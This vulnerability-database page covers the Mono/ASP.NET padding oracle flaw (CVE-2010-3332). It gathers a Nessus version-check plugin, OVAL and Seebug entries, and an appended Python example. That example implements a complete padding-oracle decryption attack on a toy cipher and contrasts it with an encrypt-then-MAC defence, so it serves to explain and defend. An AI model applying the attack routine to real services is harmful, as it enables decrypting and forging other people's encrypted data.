    # extracted from Gentoo Linux Security Advisory GLSA 201206-13.
    #
    # The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(59651);
      script_version("1.9");
      script_cvs_date("Date: 2019/08/12 17:35:38");
    
      script_cve_id("CVE-2009-0217", "CVE-2010-3332", "CVE-2010-3369", "CVE-2010-4159", "CVE-2010-4225", "CVE-2010-4254", "CVE-2011-0989", "CVE-2011-0990", "CVE-2011-0991", "CVE-2011-0992");
      script_bugtraq_id(35671, 43316, 44351, 44810, 45051, 45711, 47208);
      script_xref(name:"GLSA", value:"201206-13");
    
      script_name(english:"GLSA-201206-13 : Mono: Multiple vulnerabilities");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-201206-13
    (Mono: Multiple vulnerabilities)
    
        Multiple vulnerabilities have been discovered in Mono and Mono debugger.
          Please review the CVE identifiers referenced below for details.
      
    Impact :
    
        A remote attacker could execute arbitrary code, bypass general
          constraints, obtain the source code for .aspx applications, obtain other
          sensitive information, cause a Denial of Service, modify internal data
          structures, or corrupt the internal state of the security manager.
        A local attacker could entice a user into running Mono debugger in a
          directory containing a specially crafted library file to execute
          arbitrary code with the privileges of the user running Mono debugger.
        A context-dependent attacker could bypass the authentication mechanism
          provided by the XML Signature specification.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/201206-13"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All Mono debugger users should upgrade to the latest version:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=dev-util/mono-debugger-2.8.1-r1'
        All Mono users should upgrade to the latest version:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=dev-lang/mono-2.10.2-r1'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mono");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mono-debugger");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2009/07/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2012/06/21");
      script_set_attribute(attribute:"plugin_publication_date", value:"2012/06/22");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"dev-lang/mono", unaffected:make_list("ge 2.10.2-r1"), vulnerable:make_list("lt 2.10.2-r1"))) flag++;
    if (qpkg_check(package:"dev-util/mono-debugger", unaffected:make_list("ge 2.8.1-r1"), vulnerable:make_list("lt 2.8.1-r1"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Mono");
    }
    
  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_11_BYTEFX-DATA-MYSQL-110331.NASL
    description: The following security bugs have been fixed : - Mono was vulnerable to a padding oracle attack. (CVE-2010-3332) - Mono loaded shared libraries from the current directory. (CVE-2010-4159)
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 53528
    published: 2011-04-22
    reporter: This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/53528
    title: SuSE 11.1 Security Update : Mono (SAT Patch Number 4260)

Oval

accepted: 2014-08-18T04:00:27.401-04:00
class: vulnerability
contributors
  • name: Josh Turpin
    organization: Symantec Corporation
  • name: Dragos Prisaca
    organization: Symantec Corporation
  • name: Josh Turpin
    organization: Symantec Corporation
  • name: Maria Mikhno
    organization: ALTX-SOFT
  • name: Maria Mikhno
    organization: ALTX-SOFT
definition_extensions
  • comment: Microsoft Windows XP (32-bit) is installed
    oval: oval:org.mitre.oval:def:1353
  • comment: Microsoft Windows XP x64 is installed
    oval: oval:org.mitre.oval:def:15247
  • comment: Microsoft Windows Server 2003 (x64) is installed
    oval: oval:org.mitre.oval:def:730
  • comment: Microsoft Windows Server 2003 (ia64) Gold is installed
    oval: oval:org.mitre.oval:def:396
  • comment: Microsoft Windows Vista (32-bit) is installed
    oval: oval:org.mitre.oval:def:1282
  • comment: Microsoft Windows Vista x64 Edition is installed
    oval: oval:org.mitre.oval:def:2041
  • comment: Microsoft Windows Server 2008 (32-bit) is installed
    oval: oval:org.mitre.oval:def:4870
  • comment: Microsoft Windows Server 2008 (64-bit) is installed
    oval: oval:org.mitre.oval:def:5356
  • comment: Microsoft Windows Server 2008 (ia-64) is installed
    oval: oval:org.mitre.oval:def:5667
  • comment: Microsoft .NET Framework 1.1 Service Pack 1 is Installed
    oval: oval:org.mitre.oval:def:1834
  • comment: Microsoft Windows XP (32-bit) is installed
    oval: oval:org.mitre.oval:def:1353
  • comment: Microsoft Windows XP x64 is installed
    oval: oval:org.mitre.oval:def:15247
  • comment: Microsoft Windows Server 2003 (32-bit) is installed
    oval: oval:org.mitre.oval:def:1870
  • comment: Microsoft Windows Server 2003 (x64) is installed
    oval: oval:org.mitre.oval:def:730
  • comment: Microsoft Windows Server 2003 (ia64) Gold is installed
    oval: oval:org.mitre.oval:def:396
  • comment: Microsoft .NET Framework 2.0 Service Pack 2 is installed
    oval: oval:org.mitre.oval:def:6158
  • comment: Microsoft Windows XP (32-bit) is installed
    oval: oval:org.mitre.oval:def:1353
  • comment: Microsoft Windows XP x64 is installed
    oval: oval:org.mitre.oval:def:15247
  • comment: Microsoft Windows Server 2003 (32-bit) is installed
    oval: oval:org.mitre.oval:def:1870
  • comment: Microsoft Windows Server 2003 (x64) is installed
    oval: oval:org.mitre.oval:def:730
  • comment: Microsoft Windows Server 2003 (ia64) Gold is installed
    oval: oval:org.mitre.oval:def:396
  • comment: Microsoft .NET Framework 2.0 Service Pack 1 is installed
    oval: oval:org.mitre.oval:def:6428
  • comment: Microsoft .NET Framework 3.5 Original Release is installed
    oval: oval:org.mitre.oval:def:6689
  • comment: Microsoft Windows XP (32-bit) is installed
    oval: oval:org.mitre.oval:def:1353
  • comment: Microsoft Windows XP x64 is installed
    oval: oval:org.mitre.oval:def:15247
  • comment: Microsoft Windows Server 2003 (32-bit) is installed
    oval: oval:org.mitre.oval:def:1870
  • comment: Microsoft Windows Server 2003 (x64) is installed
    oval: oval:org.mitre.oval:def:730
  • comment: Microsoft Windows Server 2003 (ia64) Gold is installed
    oval: oval:org.mitre.oval:def:396
  • comment: Microsoft Windows Vista (32-bit) is installed
    oval: oval:org.mitre.oval:def:1282
  • comment: Microsoft Windows Vista x64 Edition is installed
    oval: oval:org.mitre.oval:def:2041
  • comment: Microsoft Windows Server 2008 (32-bit) is installed
    oval: oval:org.mitre.oval:def:4870
  • comment: Microsoft Windows Server 2008 (64-bit) is installed
    oval: oval:org.mitre.oval:def:5356
  • comment: Microsoft Windows Server 2008 (ia-64) is installed
    oval: oval:org.mitre.oval:def:5667
  • comment: Microsoft .NET Framework 3.5 Original Release is installed
    oval: oval:org.mitre.oval:def:6689
  • comment: Microsoft Windows XP (32-bit) is installed
    oval: oval:org.mitre.oval:def:1353
  • comment: Microsoft Windows XP x64 is installed
    oval: oval:org.mitre.oval:def:15247
  • comment: Microsoft Windows Server 2003 (32-bit) is installed
    oval: oval:org.mitre.oval:def:1870
  • comment: Microsoft Windows Server 2003 (x64) is installed
    oval: oval:org.mitre.oval:def:730
  • comment: Microsoft Windows Server 2003 (ia64) Gold is installed
    oval: oval:org.mitre.oval:def:396
  • comment: Microsoft Windows Vista (32-bit) is installed
    oval: oval:org.mitre.oval:def:1282
  • comment: Microsoft Windows Vista x64 Edition is installed
    oval: oval:org.mitre.oval:def:2041
  • comment: Microsoft Windows Server 2008 (32-bit) is installed
    oval: oval:org.mitre.oval:def:4870
  • comment: Microsoft Windows Server 2008 (64-bit) is installed
    oval: oval:org.mitre.oval:def:5356
  • comment: Microsoft Windows Server 2008 (ia-64) is installed
    oval: oval:org.mitre.oval:def:5667
  • comment: Microsoft .NET Framework 3.5 SP1 is installed
    oval: oval:org.mitre.oval:def:12542
  • comment: Microsoft Windows XP (32-bit) is installed
    oval: oval:org.mitre.oval:def:1353
  • comment: Microsoft Windows XP x64 is installed
    oval: oval:org.mitre.oval:def:15247
  • comment: Microsoft Windows Server 2003 (32-bit) is installed
    oval: oval:org.mitre.oval:def:1870
  • comment: Microsoft Windows Server 2003 (x64) is installed
    oval: oval:org.mitre.oval:def:730
  • comment: Microsoft Windows Server 2003 (ia64) Gold is installed
    oval: oval:org.mitre.oval:def:396
  • comment: Microsoft Windows Vista (32-bit) is installed
    oval: oval:org.mitre.oval:def:1282
  • comment: Microsoft Windows Vista x64 Edition is installed
    oval: oval:org.mitre.oval:def:2041
  • comment: Microsoft Windows Server 2008 (32-bit) is installed
    oval: oval:org.mitre.oval:def:4870
  • comment: Microsoft Windows Server 2008 (64-bit) is installed
    oval: oval:org.mitre.oval:def:5356
  • comment: Microsoft Windows Server 2008 (ia-64) is installed
    oval: oval:org.mitre.oval:def:5667
  • comment: Microsoft Windows 7 (32-bit) is installed
    oval: oval:org.mitre.oval:def:6165
  • comment: Microsoft Windows 7 x64 Edition is installed
    oval: oval:org.mitre.oval:def:5950
  • comment: Microsoft Windows Server 2008 R2 x64 Edition is installed
    oval: oval:org.mitre.oval:def:6438
  • comment: Microsoft Windows Server 2008 R2 Itanium-Based Edition is installed
    oval: oval:org.mitre.oval:def:5954
  • comment: Microsoft .NET Framework 4.0 Full is installed
    oval: oval:org.mitre.oval:def:12623
  • comment: Microsoft Windows Vista (32-bit) is installed
    oval: oval:org.mitre.oval:def:1282
  • comment: Microsoft Windows Vista x64 Edition is installed
    oval: oval:org.mitre.oval:def:2041
  • comment: Microsoft Windows Server 2008 (32-bit) is installed
    oval: oval:org.mitre.oval:def:4870
  • comment: Microsoft Windows Server 2008 (64-bit) is installed
    oval: oval:org.mitre.oval:def:5356
  • comment: Microsoft Windows Server 2008 (ia-64) is installed
    oval: oval:org.mitre.oval:def:5667
  • comment: Microsoft .NET Framework 2.0 Service Pack 1 is installed
    oval: oval:org.mitre.oval:def:6428
  • comment: Microsoft Windows Vista (32-bit) is installed
    oval: oval:org.mitre.oval:def:1282
  • comment: Microsoft Windows Vista x64 Edition is installed
    oval: oval:org.mitre.oval:def:2041
  • comment: Microsoft Windows Server 2008 (32-bit) is installed
    oval: oval:org.mitre.oval:def:4870
  • comment: Microsoft Windows Server 2008 (64-bit) is installed
    oval: oval:org.mitre.oval:def:5356
  • comment: Microsoft Windows Server 2008 (ia-64) is installed
    oval: oval:org.mitre.oval:def:5667
  • comment: Microsoft .NET Framework 2.0 Service Pack 2 is installed
    oval: oval:org.mitre.oval:def:6158
  • comment: Microsoft Windows Vista (32-bit) is installed
    oval: oval:org.mitre.oval:def:1282
  • comment: Microsoft Windows Vista x64 Edition is installed
    oval: oval:org.mitre.oval:def:2041
  • comment: Microsoft Windows Server 2008 (32-bit) is installed
    oval: oval:org.mitre.oval:def:4870
  • comment: Microsoft Windows Server 2008 (64-bit) is installed
    oval: oval:org.mitre.oval:def:5356
  • comment: Microsoft Windows Server 2008 (ia-64) is installed
    oval: oval:org.mitre.oval:def:5667
  • comment: Microsoft .NET Framework 2.0 Service Pack 2 is installed
    oval: oval:org.mitre.oval:def:6158
  • comment: Microsoft Windows 7 (32-bit) is installed
    oval: oval:org.mitre.oval:def:6165
  • comment: Microsoft Windows 7 x64 Edition is installed
    oval: oval:org.mitre.oval:def:5950
  • comment: Microsoft Windows Server 2008 R2 x64 Edition is installed
    oval: oval:org.mitre.oval:def:6438
  • comment: Microsoft Windows Server 2008 R2 Itanium-Based Edition is installed
    oval: oval:org.mitre.oval:def:5954
  • comment: Microsoft .NET Framework 3.5 SP1 is installed
    oval: oval:org.mitre.oval:def:12542
description: Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."
family: windows
id: oval:org.mitre.oval:def:12365
status: accepted
submitted: 2011-02-09T13:00:00
title: ASP.NET Padding Oracle Vulnerability
version: 48

Seebug

bulletinFamily: exploit
description: MS10-070 ASP.NET Padding Oracle information disclosure vulnerability.
    1. Vulnerability description: ASP.NET mishandles errors during cryptographic padding validation, which results in an information disclosure vulnerability. An attacker who successfully exploits it can read data encrypted by the server, such as the view state. The vulnerability can also be used for data tampering: a successful exploit lets the attacker decrypt and modify server-encrypted data. Although the attacker cannot use it to execute malicious code or directly elevate their privileges, it can be used to gather information that enables further attacks on the affected system. In other words, it does not yield a shell directly, but in theory it allows arbitrary files to be read, including database configuration files.
    2. Identifier: CVE-2010-3332
    3. Affected systems: Microsoft .NET Framework 4.0; Microsoft .NET Framework 3.5 SP1; Microsoft .NET Framework 3.5; Microsoft .NET Framework 2.0 SP2; Microsoft .NET Framework 1.0 SP3
    4. Remediation:
    4.1 Workaround: enable ASP.NET custom errors and map all error codes to the same error page; create an error.html file containing a generic error message and save it in the application's root directory.
    4.2 Microsoft patch: Microsoft has published a security bulletin (MS10-070) and the corresponding patch: http://www.microsoft.com/technet ... 10-070.mspx?pf=true
id: SSV:20182
last seen: 2017-11-19
modified: 2010-10-17
published: 2010-10-17
reporter: Root
source: https://www.seebug.org/vuldb/ssvid-20182
title: MS10-070 ASP.NET Padding Oracle File Download
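The mechanism behind the entries above, shown as an added example that is not part of this page, of ASP.NET, or of any of the listed scanners: a CBC decryption routine whose caller can tell a padding failure apart from every other outcome (the "detailed error codes" of the advisory) lets an attacker recover the plaintext block by block without the key, while an encrypt-then-MAC variant that checks a tag before decrypting and gives one generic answer defeats the same attack. The block cipher is a hypothetical 4-round Feistel construction built from HMAC-SHA256 so the example runs on the Python standard library alone; leaky_oracle, hardened_oracle, padding_oracle_attack, demo and the __VIEWSTATE-style sample record are constructed for this example. In ASP.NET the oracle was an HTTP response rather than a function returning True or False, but the attack logic is the same.

```python
import hashlib, hmac, os
BLOCK = 16  # CBC block size in bytes

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, i, half):  # keyed round function of the toy cipher, 8-byte output
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    # Hypothetical 4-round Feistel block cipher standing in for AES so the
    # example needs only the standard library; invertible, not strong.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    n = BLOCK - len(plaintext) % BLOCK
    padded, out = plaintext + bytes([n]) * n, os.urandom(BLOCK)  # out starts as the IV
    for i in range(0, len(padded), BLOCK):
        out += block_encrypt(key, _xor(padded[i:i + BLOCK], out[-BLOCK:]))
    return out

def cbc_decrypt(key, ct):
    out = b""
    for i in range(BLOCK, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), ct[i - BLOCK:i])
    return pkcs7_unpad(out)

def leaky_oracle(key):
    # The advisory's flaw in miniature: "padding invalid" is distinguishable from every other outcome.
    def oracle(ct):
        try:
            cbc_decrypt(key, ct)
            return True
        except ValueError:
            return False
    return oracle

def hardened_oracle(key, mac_key):
    # Encrypt-then-MAC: tag checked before any decryption, one generic answer for every failure.
    def oracle(msg):
        ct, tag = msg[:-32], msg[-32:]
        expected = hmac.new(mac_key, ct, hashlib.sha256).digest()
        return hmac.compare_digest(expected, tag) and leaky_oracle(key)(ct)
    return oracle

def padding_oracle_attack(oracle, ct):
    # Recovers every block after the IV from yes/no answers alone, no key needed; at most 16 * 256 queries per block.
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # block_decrypt(key, target), learned byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos  # padding value forced onto bytes pos..15
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padv
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1 and not oracle(  # rule out an accidental longer valid padding (02 02, ...)
                        bytes(forged[:-2]) + bytes([forged[-2] ^ 0xFF, guess]) + target):
                    continue
                inter[pos] = guess ^ padv
                break
            else:
                raise RuntimeError("no padding-valid guess: the oracle is not leaking")
        recovered += _xor(bytes(inter), prev)
    return pkcs7_unpad(recovered)

def demo():
    # Constructed sample data: a view-state-like record under a random key.
    key, mac_key = os.urandom(32), os.urandom(32)
    ct = cbc_encrypt(key, b"__VIEWSTATE: user=admin; role=1")
    stolen = padding_oracle_attack(leaky_oracle(key), ct)
    sealed = ct + hmac.new(mac_key, ct, hashlib.sha256).digest()
    try:
        padding_oracle_attack(hardened_oracle(key, mac_key), sealed)
        blocked = False
    except RuntimeError:
        blocked = True
    return stolen, blocked
```

Calling demo() returns the recovered record together with True, meaning the hardened oracle never gave the attacker a padding-valid answer. The workaround in the Seebug entry (one uniform error page for every failure) removes the distinguishable response that the attack depends on, which is the same property leaky_oracle lacks; the durable fix is to authenticate the ciphertext before decrypting at all, which is what hardened_oracle models.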